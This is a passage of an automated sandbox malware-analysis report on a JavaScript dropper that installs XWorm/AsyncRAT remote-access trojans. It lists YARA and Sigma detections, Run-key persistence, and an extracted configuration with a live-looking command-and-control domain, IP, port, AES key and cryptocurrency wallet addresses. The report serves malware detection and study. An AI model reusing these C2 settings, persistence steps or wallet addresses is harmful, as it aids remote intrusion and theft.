Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc96f0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf2554:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfd798:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1089f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11415c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x126c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1d909:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28b65:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x342cd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5d125:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
11.2.Service.exe.28d801c.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.28d801c.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xed88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x19fcc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x25228:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x30b98:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5f470:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6a6b4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x75910:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x81078:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa9ed0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb5114:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc0370:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcbad8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf4930:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xffb74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10add0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x116538:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13f39c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14a5e0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x15583c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x160fa4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xee25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
4.2.GeUT.exe.3378700.5.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.GeUT.exe.3378700.5.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xed88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x19fcc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x25228:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x30990:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x597e8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x64a2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6fc88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7b3f0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa4248:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xaf48c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xba6e8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc5e50:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xeecb4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf9ef8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x105154:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1108bc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xee25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1a069:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x252c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x30a2d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x59885:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
11.2.Service.exe.28d4788.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.28d4788.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1261c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1d860:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28abc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3442c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x62d04:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6df48:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x791a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8490c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xad764:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb89a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc3c04:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcf36c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf81c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x103408:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10e664:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x119dcc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x142c30:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14de74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1590d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x164838:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x126b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
11.2.Service.exe.28d63c0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.Service.exe.28d63c0.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x109e4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1bc28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x26e84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x327f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x610cc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6c310:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7756c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x82cd4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xabb2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb6d70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc1fcc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcd734:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf658c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1017d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10ca2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x118194:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x140ff8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14c23c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x157498:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x162c00:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10a81:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\GeUT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\GeUT.exe, ProcessId: 3784, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2940, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", ProcessId: 1776, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\GeUT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\GeUT.exe, ProcessId: 3784, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2940, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js", ProcessId: 1776, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: cc.js

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Service.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}

Multi AV Scanner detection for submitted file

Source: cc.js	ReversingLabs: Detection: 39%
Source: cc.js	Virustotal: Detection: 31%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Service.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: as525795.duckdns.org,194.37.97.150
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: 6980
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: <123456789>
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: <Xwormmm>
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: XWorm V5.3
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: adobe.exe
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: bc1q6ctx30m7yf3swhuskp3n34awjtnxw7974qewyh
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: 0x344Bc250C2901d36f2FD4698632D289B9977BEd6
Source: 5.2.GeUT.exe.400000.0.unpack	String decryptor: BLMpkfcDYXR1q2bgbj2mBPk9uQsgAVc6vdv62zRuMAHN

Source:	Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: as525795.duckdns.org
Source: Malware configuration extractor	URLs: 194.37.97.150

Uses dynamic DNS services

Source: unknown

DNS query: name: as525795.duckdns.org

Source: unknown

DNS traffic detected: query: as525795.duckdns.org replaycode: Server failure (2)

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: as525795.duckdns.org

Source: GeUT.exe, 00000008.00000002.2286549047.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: GeUT.exe, 00000003.00000002.3410104953.00000000025D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 2_2_00C90D30	2_2_00C90D30
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_00AE2B36	3_2_00AE2B36
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_00AE13B8	3_2_00AE13B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_00AE3B2E	3_2_00AE3B2E
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA947C	3_2_04EA947C
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA6CA8	3_2_04EA6CA8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA8878	3_2_04EA8878
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA5B18	3_2_04EA5B18
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EAC5D0	3_2_04EAC5D0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA33C4	3_2_04EA33C4
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA9D10	3_2_04EA9D10
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA4EA0	3_2_04EA4EA0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 3_2_04EA4E90	3_2_04EA4E90
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_018743D0	4_2_018743D0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_01877288	4_2_01877288
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_01875208	4_2_01875208
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_01870D32	4_2_01870D32
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_01876450	4_2_01876450
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_0187727C	4_2_0187727C
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 4_2_0187644A	4_2_0187644A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 5_2_02E113B8	5_2_02E113B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 6_2_011B13B8	6_2_011B13B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 7_2_00FA13B8	7_2_00FA13B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 8_2_008813B8	8_2_008813B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Code function: 9_2_029113B8	9_2_029113B8
